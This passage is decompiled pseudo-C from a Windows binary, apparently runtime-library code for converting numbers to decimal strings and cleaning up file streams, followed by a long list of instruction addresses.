											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
											_t1153 = 0xa;
											_t1154 = _t841 * _t1153 >> 0x20;
											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
											asm("adc edx, 0x0");
											_t1200 = _t1200 + 1;
											_t1249 = _t1154;
											__eflags = _t1200 - _t1086;
										} while (_t1200 != _t1086);
										_v1896 = _t1249;
										__eflags = _t1249;
										_t1245 = _v1872;
										if(_t1249 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00CCAA64( &_v468, _t1064,  &_v2404, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
												_v472 = _v472 + 1;
											}
										}
										_t1196 = _t1245;
									}
									_t815 = E00CCC0B0( &_v472,  &_v936);
									_t1146 = 0xa;
									__eflags = _t815 - _t1146;
									if(_t815 != _t1146) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1245 = _t1196 + 1;
											 *_t1196 = _t816;
											_v1872 = _t1245;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1245 = _t1196 + 1;
										_t832 = _v936;
										 *_t1196 = 0x31;
										_v1872 = _t1245;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1199 = 0;
											_t1248 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1199 = _t833 * _t1146 >> 0x20;
												_t1146 = 0xa;
												__eflags = _t1094 - _t1248;
											} while (_t1094 != _t1248);
											_t1245 = _v1872;
											__eflags = _t1199;
											if(_t1199 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00CCAA64( &_v932, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1245 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1197 = 0;
											_t1246 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1246;
											} while (_t1090 != _t1246);
											_t1247 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00CCAA64( &_v468, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E00CCC0B0( &_v472,  &_v936);
											_t1198 = 8;
											_t1070 = _v1916 - _t1247;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1151 = _t708 + 0x30;
												__eflags = _t1070 - _t1198;
												if(_t1070 >= _t1198) {
													 *((char*)(_t1198 + _t1247)) = _t1151;
												}
												_t1198 = _t1198 - 1;
												__eflags = _t1198 - 0xffffffff;
											} while (_t1198 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1245 = _t1247 + _t1070;
											_v1872 = _t1245;
											__eflags = _t1245 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1245 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1236 & 0x000fffff;
					if((_t1188 | _t1236 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xcd6ac4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E00CC79F6() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00CC7DBB();
							asm("int3");
							E00CBE2F0(_t1142, 0xcda9e8, 0x10);
							_v32 = _v32 & 0x00000000;
							E00CC9931(8);
							_pop(_t1071);
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1237 = 3;
							while(1) {
								_v36 = _t1237;
								__eflags = _t1237 -  *0xd00404; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0xd00408; // 0x0
								_t764 =  *(_t763 + _t1237 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0xd00408; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
										_t774 = E00CCEC83(_t1071, _t1142, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0xd00408; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
									_t770 =  *0xd00408; // 0x0
									E00CC7A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
									_pop(_t1071);
									_t772 =  *0xd00408; // 0x0
									_t737 = _t772 + _t1237 * 4;
									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1237 = _t1237 + 1;
							}
							_v8 = 0xfffffffe;
							E00CCD991();
							return E00CBE336(_t1142);
						} else {
							L309:
							_t1286 = _v1936;
							if(_v1936 != 0) {
								_t755 = E00CCDFE5(_t1070, _t1286,  &_v1944);
							}
							return E00CBE203(_t755, _v8 ^ _t1273);
						}
					}
				}
			}































































































































































































































































                0x00ccc55e
                0x00ccc561
                0x00ccc563
                0x00ccc569
                0x00ccc570
                0x00ccc574
                0x00ccc57d
                0x00ccc57e
                0x00ccc57f
                0x00ccc582
                0x00ccc588
                0x00ccc58e
                0x00ccc593
                0x00ccc5a2
                0x00ccc5a4
                0x00ccc5a6
                0x00ccc5a6
                0x00ccc5ad
                0x00ccc5b7
                0x00ccc5bc
                0x00ccc5bf
                0x00ccc5e3
                0x00ccc5e7
                0x00ccc5ec
                0x00ccc5ed
                0x00ccc5ef
                0x00ccc5f1
                0x00ccc5f7
                0x00ccc5f7
                0x00ccc5fe
                0x00ccc5fe
                0x00ccc601
                0x00ccd8b1
                0x00000000
                0x00ccc607
                0x00ccc607
                0x00ccc607
                0x00ccc60a
                0x00ccd8aa
                0x00000000
                0x00ccc610
                0x00ccc610
                0x00ccc610
                0x00ccc613
                0x00ccd8a3
                0x00000000
                0x00ccc619
                0x00ccc619
                0x00ccc61c
                0x00ccd89c
                0x00000000
                0x00ccc622
                0x00ccc62b
                0x00ccc633
                0x00ccc636
                0x00ccc639
                0x00ccc63c
                0x00ccc642
                0x00ccc64a
                0x00ccc650
                0x00ccc65a
                0x00ccc65a
                0x00ccc65d
                0x00ccc665
                0x00ccc66c
                0x00ccc66c
                0x00ccc65f
                0x00ccc65f
                0x00ccc661
                0x00ccc674
                0x00ccc67a
                0x00ccc67c
                0x00ccc680
                0x00ccc685
                0x00ccc692
                0x00ccc694
                0x00ccc69a
                0x00ccc69f
                0x00ccc6a0
                0x00ccc6a1
                0x00ccc6ab
                0x00ccc6b0
                0x00ccc6b6
                0x00ccc6bb
                0x00ccc6c4
                0x00ccc6c4
                0x00ccc6c6
                0x00ccc6bd
                0x00ccc6bd
                0x00ccc6c2
                0x00000000
                0x00000000
                0x00ccc6c2
                0x00ccc6cc
                0x00ccc6d4
                0x00ccc6d6
                0x00ccc6df
                0x00ccc6e0
                0x00ccc6e6
                0x00ccc6e8
                0x00cccadb
                0x00cccae1
                0x00cccc00
                0x00cccc00
                0x00cccc07
                0x00cccc07
                0x00cccc07
                0x00cccc0e
                0x00cccc11
                0x00cccc18
                0x00cccc18
                0x00cccc13
                0x00cccc13
                0x00cccc13
                0x00cccc1c
                0x00cccc1d
                0x00cccc1f
                0x00cccc22
                0x00cccc25
                0x00cccc28
                0x00cccc2e
                0x00cccc31
                0x00cccc34
                0x00cccc3e
                0x00cccc3e
                0x00cccc3e
                0x00cccc36
                0x00cccc36
                0x00cccc38
                0x00000000
                0x00cccc3a
                0x00cccc3a
                0x00cccc3a
                0x00cccc38
                0x00cccc40
                0x00cccc42
                0x00cccce3
                0x00cccce3
                0x00ccccf0
                0x00ccccf0
                0x00ccccf0
                0x00cccd06
                0x00cccd0b
                0x00cccc48
                0x00cccc48
                0x00cccc4a
                0x00000000
                0x00cccc50
                0x00cccc52
                0x00cccc53
                0x00cccc55
                0x00cccc57
                0x00cccc57
                0x00cccc59
                0x00cccc5c
                0x00cccc64
                0x00cccc66
                0x00cccc69
                0x00cccc6f
                0x00cccc6f
                0x00cccc71
                0x00cccc7d
                0x00cccc7d
                0x00cccc7d
                0x00cccc73
                0x00cccc75
                0x00cccc75
                0x00cccc84
                0x00cccc87
                0x00cccc89
                0x00cccc90
                0x00cccc90
                0x00cccc8b
                0x00cccc8b
                0x00cccc8b
                0x00cccc98
                0x00cccca2
                0x00cccca8
                0x00cccca9
                0x00ccccae
                0x00ccccb4
                0x00ccccb7
                0x00000000
                0x00000000
                0x00ccccb9
                0x00ccccb9
                0x00ccccc1
                0x00ccccc1
                0x00ccccc7
                0x00ccccce
                0x00ccccdb
                0x00ccccd0
                0x00ccccd0
                0x00ccccd3
                0x00ccccd3
                0x00ccccce
                0x00cccc4a
                0x00cccd17
                0x00cccd27
                0x00cccd34
                0x00cccd36
                0x00cccd3d
                0x00cccae7
                0x00cccae7
                0x00cccaf0
                0x00cccaf1
                0x00cccafb
                0x00cccb01
                0x00cccb03
                0x00cccb09
                0x00cccb09
                0x00cccb0b
                0x00cccb0b
                0x00cccb12
                0x00cccb19
                0x00000000
                0x00000000
                0x00cccb1f
                0x00cccb22
                0x00cccb25
                0x00000000
                0x00cccb27
                0x00cccb27
                0x00cccb27
                0x00cccb27
                0x00cccb2e
                0x00cccb31
                0x00cccb38
                0x00cccb38
                0x00cccb33
                0x00cccb33
                0x00cccb33
                0x00cccb3c
                0x00cccb3f
                0x00cccb41
                0x00cccb43
                0x00cccb49
                0x00cccb4f
                0x00cccb51
                0x00cccb51
                0x00cccb51
                0x00cccb58
                0x00cccb58
                0x00cccb5a
                0x00cccb66
                0x00cccb66
                0x00cccb66
                0x00cccb5c
                0x00cccb5e
                0x00cccb5e
                0x00cccb6d
                0x00cccb70
                0x00cccb72
                0x00cccb79
                0x00cccb79
                0x00cccb74
                0x00cccb74
                0x00cccb74
                0x00cccb81
                0x00cccb8c
                0x00cccb92
                0x00cccb93
                0x00cccb98
                0x00cccb9e
                0x00cccba1
                0x00000000
                0x00000000
                0x00cccba3
                0x00cccba3
                0x00cccbad
                0x00cccbb8
                0x00cccbc0
                0x00cccbc6
                0x00cccbd1
                0x00cccbd7
                0x00cccbde
                0x00cccbf1
                0x00cccbf8
                0x00cccbf8
                0x00000000
                0x00cccb25
                0x00cccb0b
                0x00000000
                0x00cccb03
                0x00cccd40
                0x00cccd40
                0x00cccd46
                0x00cccd4b
                0x00cccd51
                0x00cccd64
                0x00cccd69
                0x00ccc6ee
                0x00ccc6ee
                0x00ccc6f7
                0x00ccc6f8
                0x00ccc702
                0x00ccc708
                0x00ccc70a
                0x00ccc910
                0x00ccc918
                0x00ccc91b
                0x00ccc920
                0x00ccc923
                0x00ccc92b
                0x00ccc92f
                0x00ccc935
                0x00ccc93b
                0x00ccc940
                0x00ccc947
                0x00ccc948
                0x00ccc948
                0x00ccc948
                0x00ccc94f
                0x00ccc952
                0x00ccc95a
                0x00ccc960
                0x00ccc965
                0x00ccc965
                0x00ccc962
                0x00ccc962
                0x00ccc962
                0x00ccc969
                0x00ccc96a
                0x00ccc96c
                0x00ccc96f
                0x00ccc975
                0x00ccc97b
                0x00ccc97e
                0x00ccc981
                0x00ccc987
                0x00ccc98a
                0x00ccc98d
                0x00ccc997
                0x00ccc997
                0x00ccc997
                0x00ccc98f
                0x00ccc98f
                0x00ccc991
                0x00000000
                0x00ccc993
                0x00ccc993
                0x00ccc993
                0x00ccc991
                0x00ccc999
                0x00ccc99b
                0x00ccca8d
                0x00ccca8d
                0x00ccca8f
                0x00ccca95
                0x00ccca9b
                0x00cccab0
                0x00cccab5
                0x00ccc9a1
                0x00ccc9a1
                0x00ccc9a3
                0x00000000
                0x00ccc9a9
                0x00ccc9ab
                0x00ccc9ac
                0x00ccc9ae
                0x00ccc9b0
                0x00ccc9b2
                0x00ccc9b2
                0x00ccc9b8
                0x00ccc9ba
                0x00ccc9c0
                0x00ccc9c3
                0x00ccc9d1
                0x00ccc9d7
                0x00ccc9d7
                0x00ccc9d9
                0x00ccc9dc
                0x00ccc9e2
                0x00ccc9e2
                0x00ccc9e4
                0x00000000
                0x00000000
                0x00ccc9e6
                0x00ccc9e8
                0x00ccc9ee
                0x00ccc9ee
                0x00ccc9ea
                0x00ccc9ea
                0x00ccc9ea
                0x00ccc9f3
                0x00ccc9f5
                0x00ccc9fc
                0x00ccc9fc
                0x00ccc9f7
                0x00ccc9f7
                0x00ccc9f7
                0x00ccca22
                0x00ccca28
                0x00ccca2b
                0x00ccca31
                0x00ccca38
                0x00ccca39
                0x00ccca3a
                0x00ccca40
                0x00ccca43
                0x00ccca45
                0x00000000
                0x00ccca45
                0x00000000
                0x00ccca43
                0x00ccca4d
                0x00ccca53
                0x00ccca5b
                0x00ccca5b
                0x00ccca5c
                0x00ccca5e
                0x00ccca62
                0x00ccca6a
                0x00ccca6a
                0x00ccca6a
                0x00ccca6c
                0x00ccca73
                0x00ccca78
                0x00ccca85
                0x00ccca7a
                0x00ccca7d
                0x00ccca7d
                0x00ccca78
                0x00ccc9a3
                0x00cccab8
                0x00cccac2
                0x00cccac8
                0x00cccace
                0x00cccad4
                0x00ccc710
                0x00ccc710
                0x00ccc710
                0x00ccc712
                0x00ccc719
                0x00ccc720
                0x00000000
                0x00000000
                0x00ccc726
                0x00ccc729
                0x00ccc72c
                0x00000000
                0x00ccc72e
                0x00ccc736
                0x00ccc73b
                0x00ccc740
                0x00ccc741
                0x00ccc743
                0x00ccc74b
                0x00ccc74f
                0x00ccc755
                0x00ccc75b
                0x00ccc760
                0x00ccc767
                0x00ccc767
                0x00ccc768
                0x00ccc76b
                0x00ccc773
                0x00ccc779
                0x00ccc77e
                0x00ccc77e
                0x00ccc77b
                0x00ccc77b
                0x00ccc77b
                0x00ccc782
                0x00ccc783
                0x00ccc785
                0x00ccc788
                0x00ccc78e
                0x00ccc794
                0x00ccc797
                0x00ccc79a
                0x00ccc7a0
                0x00ccc7a3
                0x00ccc7a6
                0x00ccc7b0
                0x00ccc7b0
                0x00ccc7b0
                0x00ccc7a8
                0x00ccc7a8
                0x00ccc7aa
                0x00000000
                0x00ccc7ac
                0x00ccc7ac
                0x00ccc7ac
                0x00ccc7aa
                0x00ccc7b2
                0x00ccc7b4
                0x00ccc8a9
                0x00ccc8a9
                0x00ccc8ab
                0x00ccc8b1
                0x00ccc8b7
                0x00ccc8cc
                0x00ccc8d1
                0x00ccc7ba
                0x00ccc7ba
                0x00ccc7bc
                0x00000000
                0x00ccc7c2
                0x00ccc7c4
                0x00ccc7c5
                0x00ccc7c7
                0x00ccc7c9
                0x00ccc7cb
                0x00ccc7cb
                0x00ccc7d1
                0x00ccc7d3
                0x00ccc7d9
                0x00ccc7dc
                0x00ccc7ea
                0x00ccc7f0
                0x00ccc7f0
                0x00ccc7f2
                0x00ccc7f5
                0x00ccc7fb
                0x00ccc7fb
                0x00ccc7fd
                0x00000000
                0x00000000
                0x00ccc7ff
                0x00ccc801
                0x00ccc807
                0x00ccc807
                0x00ccc803
                0x00ccc803
                0x00ccc803
                0x00ccc80c
                0x00ccc80e
                0x00ccc81b
                0x00ccc81b
                0x00ccc810
                0x00ccc816
                0x00ccc816
                0x00ccc839
                0x00ccc841
                0x00ccc848
                0x00ccc84f
                0x00ccc850
                0x00ccc853
                0x00ccc859
                0x00ccc85f
                0x00ccc862
                0x00ccc864
                0x00000000
                0x00ccc864
                0x00000000
                0x00ccc862
                0x00ccc86c
                0x00ccc872
                0x00ccc872
                0x00ccc878
                0x00ccc87a
                0x00ccc884
                0x00ccc886
                0x00ccc886
                0x00ccc886
                0x00ccc888
                0x00ccc88f
                0x00ccc894
                0x00ccc8a1
                0x00ccc896
                0x00ccc899
                0x00ccc899
                0x00ccc894
                0x00ccc7bc
                0x00ccc8d4
                0x00ccc8df
                0x00ccc8e0
                0x00ccc8e1
                0x00ccc8e7
                0x00ccc8ed
                0x00ccc8f3
                0x00ccc8f3
                0x00000000
                0x00ccc72c
                0x00000000
                0x00ccc712
                0x00ccc8f4
                0x00ccc8fa
                0x00ccc901
                0x00ccc902
                0x00ccc903
                0x00ccc908
                0x00ccc908
                0x00cccd6c
                0x00cccd76
                0x00cccd77
                0x00cccd7d
                0x00cccd7f
                0x00ccd1e8
                0x00ccd1ea
                0x00ccd1ec
                0x00ccd1f2
                0x00ccd1f4
                0x00ccd1fa
                0x00ccd1fc
                0x00ccd54e
                0x00ccd54e
                0x00ccd550
                0x00ccd556
                0x00ccd55d
                0x00ccd563
                0x00ccd565
                0x00ccd603
                0x00ccd603
                0x00ccd605
                0x00ccd606
                0x00ccd60c
                0x00000000
                0x00ccd56b
                0x00ccd56b
                0x00ccd56e
                0x00ccd574
                0x00ccd57a
                0x00ccd57c
                0x00ccd582
                0x00ccd584
                0x00ccd584
                0x00ccd586
                0x00ccd586
                0x00ccd58f
                0x00ccd596
                0x00ccd59c
                0x00ccd59f
                0x00ccd5a0
                0x00ccd5a2
                0x00ccd5a2
                0x00ccd5a6
                0x00ccd5a8
                0x00ccd5aa
                0x00ccd5b0
                0x00ccd5b3
                0x00000000
                0x00ccd5b5
                0x00ccd5b5
                0x00ccd5bc
                0x00ccd5bc
                0x00ccd5b3
                0x00ccd5a8
                0x00ccd57c
                0x00ccd56e
                0x00ccd565
                0x00ccd202
                0x00ccd202
                0x00ccd202
                0x00ccd205
                0x00ccd209
                0x00ccd209
                0x00ccd20a
                0x00ccd21c
                0x00ccd229
                0x00ccd238
                0x00ccd262
                0x00ccd267
                0x00ccd26d
                0x00ccd270
                0x00ccd276
                0x00ccd279
                0x00ccd312
                0x00ccd319
                0x00ccd397
                0x00ccd39d
                0x00ccd3a3
                0x00ccd3a6
                0x00ccd3a8
                0x00ccd431
                0x00ccd3ae
                0x00ccd3ae
                0x00ccd3b4
                0x00ccd3b4
                0x00ccd3ba
                0x00ccd3c0
                0x00ccd3c2
                0x00ccd3c4
                0x00ccd3c4
                0x00ccd3ca
                0x00ccd3d0
                0x00ccd3d2
                0x00ccd3da
                0x00ccd3da
                0x00ccd3e0
                0x00ccd3e2
                0x00ccd3e4
                0x00ccd3ea
                0x00ccd3ec
                0x00ccd503
                0x00ccd505
                0x00ccd50b
                0x00ccd50b
                0x00ccd50e
                0x00ccd50f
                0x00000000
                0x00ccd3f2
                0x00ccd3f8
                0x00ccd3f8
                0x00ccd3fa
                0x00ccd400
                0x00ccd403
                0x00ccd40a
                0x00ccd410
                0x00ccd412
                0x00ccd439
                0x00ccd43b
                0x00ccd43d
                0x00ccd43f
                0x00ccd445
                0x00ccd44b
                0x00ccd4e5
                0x00ccd4e5
                0x00ccd4e8
                0x00000000
                0x00ccd4ee
                0x00ccd4ee
                0x00ccd4f4
                0x00000000
                0x00ccd4f4
                0x00ccd451
                0x00ccd451
                0x00ccd451
                0x00ccd454
                0x00000000
                0x00000000
                0x00ccd456
                0x00ccd458
                0x00ccd45a
                0x00ccd463
                0x00ccd463
                0x00ccd465
                0x00ccd46b
                0x00ccd46b
                0x00ccd477
                0x00ccd482
                0x00ccd485
                0x00ccd492
                0x00ccd495
                0x00ccd496
                0x00ccd497
                0x00ccd49d
                0x00ccd49f
                0x00ccd4a5
                0x00ccd4ab
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccd4ad
                0x00ccd4ad
                0x00ccd4ad
                0x00ccd4af
                0x00000000
                0x00000000
                0x00ccd4b1
                0x00ccd4b4
                0x00000000
                0x00ccd4ba
                0x00ccd4ba
                0x00ccd4bc
                0x00ccd4be
                0x00ccd4be
                0x00ccd4be
                0x00ccd4c6
                0x00ccd4c9
                0x00ccd4c9
                0x00ccd4cf
                0x00ccd4d1
                0x00ccd4d3
                0x00ccd4da
                0x00ccd4e0
                0x00ccd4e2
                0x00000000
                0x00ccd4e2
                0x00000000
                0x00ccd4b4
                0x00000000
                0x00ccd4ad
                0x00000000
                0x00ccd451
                0x00ccd414
                0x00ccd414
                0x00ccd416
                0x00ccd41c
                0x00ccd423
                0x00ccd423
                0x00ccd426
                0x00ccd426
                0x00000000
                0x00ccd416
                0x00000000
                0x00ccd4fa
                0x00ccd4fa
                0x00ccd4fb
                0x00ccd4fb
                0x00000000
                0x00ccd400
                0x00ccd31b
                0x00ccd31b
                0x00ccd32d
                0x00ccd33c
                0x00ccd341
                0x00ccd344
                0x00ccd346
                0x00000000
                0x00ccd34c
                0x00ccd34c
                0x00ccd34f
                0x00000000
                0x00ccd355
                0x00ccd355
                0x00ccd35c
                0x00000000
                0x00ccd362
                0x00ccd368
                0x00ccd36a
                0x00ccd370
                0x00ccd370
                0x00ccd372
                0x00ccd372
                0x00ccd374
                0x00ccd37d
                0x00ccd384
                0x00ccd387
                0x00ccd388
                0x00ccd38a
                0x00ccd38a
                0x00000000
                0x00ccd392
                0x00ccd35c
                0x00ccd34f
                0x00ccd346
                0x00ccd27f
                0x00ccd27f
                0x00ccd285
                0x00ccd287
                0x00ccd2a3
                0x00ccd2a6
                0x00000000
                0x00ccd2ac
                0x00ccd2ac
                0x00ccd2b3
                0x00000000
                0x00ccd2b9
                0x00ccd2bf
                0x00ccd2c1
                0x00ccd2c7
                0x00ccd2c7
                0x00ccd2c9
                0x00ccd2c9
                0x00ccd2cb
                0x00ccd2d4
                0x00ccd2db
                0x00ccd2de
                0x00ccd2df
                0x00ccd2e1
                0x00ccd2e1
                0x00ccd2e9
                0x00ccd2e9
                0x00ccd2eb
                0x00000000
                0x00ccd2f1
                0x00ccd2f1
                0x00ccd2f7
                0x00ccd2fa
                0x00ccd5c4
                0x00ccd5c7
                0x00ccd5cd
                0x00ccd5e2
                0x00ccd5e7
                0x00ccd5ea
                0x00ccd300
                0x00ccd300
                0x00ccd307
                0x00000000
                0x00ccd307
                0x00ccd2fa
                0x00ccd2eb
                0x00ccd2b3
                0x00ccd289
                0x00ccd289
                0x00ccd28b
                0x00ccd291
                0x00ccd297
                0x00ccd298
                0x00ccd515
                0x00ccd515
                0x00ccd51c
                0x00ccd51d
                0x00ccd51e
                0x00ccd523
                0x00ccd526
                0x00ccd526
                0x00ccd526
                0x00ccd287
                0x00ccd528
                0x00ccd528
                0x00ccd52a
                0x00ccd5f1
                0x00ccd5f8
                0x00ccd5ff
                0x00ccd612
                0x00ccd618
                0x00ccd619
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccd530
                0x00ccd536
                0x00ccd536
                0x00ccd53c
                0x00ccd53c
                0x00ccd548
                0x00000000
                0x00ccd548
                0x00cccd85
                0x00cccd85
                0x00cccd87
                0x00cccd8d
                0x00cccd8f
                0x00cccd95
                0x00cccd97
                0x00ccd10e
                0x00ccd10e
                0x00ccd110
                0x00ccd116
                0x00ccd11d
                0x00ccd11f
                0x00ccd17e
                0x00ccd181
                0x00ccd187
                0x00ccd18d
                0x00ccd193
                0x00ccd195
                0x00ccd19b
                0x00ccd19d
                0x00ccd19d
                0x00ccd19f
                0x00ccd19f
                0x00ccd1a1
                0x00ccd1aa
                0x00ccd1b1
                0x00ccd1b4
                0x00ccd1b5
                0x00ccd1b7
                0x00ccd1b7
                0x00ccd1bf
                0x00ccd1c1
                0x00ccd1c7
                0x00ccd1cd
                0x00ccd1d0
                0x00000000
                0x00ccd1d6
                0x00ccd1d6
                0x00ccd1dd
                0x00ccd1dd
                0x00ccd1d0
                0x00ccd1c1
                0x00ccd195
                0x00ccd121
                0x00ccd121
                0x00ccd123
                0x00ccd129
                0x00ccd12f
                0x00000000
                0x00ccd12f
                0x00ccd11f
                0x00cccd9d
                0x00cccd9d
                0x00cccd9d
                0x00cccda0
                0x00cccda4
                0x00cccda4
                0x00cccda5
                0x00cccdb7
                0x00cccdc4
                0x00cccdd3
                0x00cccdfd
                0x00ccce02
                0x00ccce08
                0x00ccce0b
                0x00ccce11
                0x00ccce14
                0x00ccce90
                0x00ccce97
                0x00cccf5b
                0x00cccf61
                0x00cccf67
                0x00cccf6a
                0x00cccf6c
                0x00cccff5
                0x00cccf72
                0x00cccf72
                0x00cccf78
                0x00cccf78
                0x00cccf7e
                0x00cccf84
                0x00cccf86
                0x00cccf88
                0x00cccf88
                0x00cccf8e
                0x00cccf94
                0x00cccf96
                0x00cccf9e
                0x00cccf9e
                0x00cccfa4
                0x00cccfa6
                0x00cccfa8
                0x00cccfae
                0x00cccfb0
                0x00ccd0c7
                0x00ccd0c9
                0x00ccd0cf
                0x00ccd0cf
                0x00000000
                0x00cccfb6
                0x00cccfbc
                0x00cccfbc
                0x00cccfbe
                0x00cccfc4
                0x00cccfc7
                0x00cccfce
                0x00cccfd4
                0x00cccfd6
                0x00cccffd
                0x00cccfff
                0x00ccd001
                0x00ccd003
                0x00ccd009
                0x00ccd00f
                0x00ccd0a9
                0x00ccd0a9
                0x00ccd0ac
                0x00000000
                0x00ccd0b2
                0x00ccd0b2
                0x00ccd0b8
                0x00000000
                0x00ccd0b8
                0x00ccd015
                0x00ccd015
                0x00ccd015
                0x00ccd018
                0x00000000
                0x00000000
                0x00ccd01a
                0x00ccd01c
                0x00ccd01e
                0x00ccd027
                0x00ccd027
                0x00ccd029
                0x00ccd02f
                0x00ccd02f
                0x00ccd03b
                0x00ccd046
                0x00ccd049
                0x00ccd056
                0x00ccd059
                0x00ccd05a
                0x00ccd05b
                0x00ccd061
                0x00ccd063
                0x00ccd069
                0x00ccd06f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00ccd071
                0x00ccd071
                0x00ccd071
                0x00ccd073
                0x00000000
                0x00000000
                0x00ccd075
                0x00ccd078
                0x00ccd132
                0x00ccd132
                0x00ccd134
                0x00ccd13a
                0x00ccd140
                0x00ccd141
                0x00000000
                0x00ccd07e
                0x00ccd07e
                0x00ccd080
                0x00ccd082
                0x00ccd082
                0x00ccd082
                0x00ccd08a
                0x00ccd08d
                0x00ccd08d
                0x00ccd093
                0x00ccd095
                0x00ccd097
                0x00ccd09e
                0x00ccd0a4
                0x00ccd0a6
                0x00000000
                0x00ccd0a6
                0x00000000
                0x00ccd078
                0x00000000
                0x00ccd071
                0x00000000
                0x00ccd015
                0x00cccfd8
                0x00cccfd8
                0x00cccfda
                0x00cccfe0
                0x00cccfe7
                0x00cccfe7
                0x00cccfea
                0x00cccfea
                0x00000000
                0x00cccfda
                0x00000000
                0x00ccd0be
                0x00ccd0be
                0x00ccd0bf
                0x00ccd0bf
                0x00000000
                0x00cccfc4
                0x00ccce9d
                0x00ccce9d
                0x00ccceaf
                0x00cccebe
                0x00cccec3
                0x00cccec6
                0x00cccec8
                0x00cccee4
                0x00cccee7
                0x00000000
                0x00ccceed
                0x00ccceed
                0x00cccef4
                0x00000000
                0x00cccefa
                0x00cccf00
                0x00cccf02
                0x00cccf08
                0x00cccf08
                0x00cccf0a
                0x00cccf0a
                0x00cccf0c
                0x00cccf15
                0x00cccf1c
                0x00cccf1f
                0x00cccf20
                0x00cccf22
                0x00cccf22
                0x00000000
                0x00cccf0a
                0x00cccef4
                0x00ccceca
                0x00cccecc
                0x00ccced2
                0x00ccced8
                0x00ccced9
                0x00000000
                0x00ccced9
                0x00cccec8
                0x00ccce16
                0x00ccce16
                0x00ccce1c
                0x00ccce1e
                0x00ccce33
                0x00ccce36
                0x00000000
                0x00ccce3c
                0x00ccce3c
                0x00ccce43
                0x00000000
                0x00ccce49
                0x00ccce4f
                0x00ccce51
                0x00ccce57
                0x00ccce57
                0x00ccce59
                0x00ccce59
                0x00ccce5b
                0x00ccce64
                0x00ccce6b
                0x00ccce6e
                0x00ccce6f
                0x00ccce71
                0x00ccce71
                0x00cccf2a
                0x00cccf2a
                0x00cccf2c
                0x00000000
                0x00cccf32
                0x00cccf32
                0x00cccf38
                0x00cccf3b
                0x00ccce7e
                0x00ccce85
                0x00000000
                0x00cccf41
                0x00cccf43
                0x00cccf49
                0x00cccf4f
                0x00cccf50
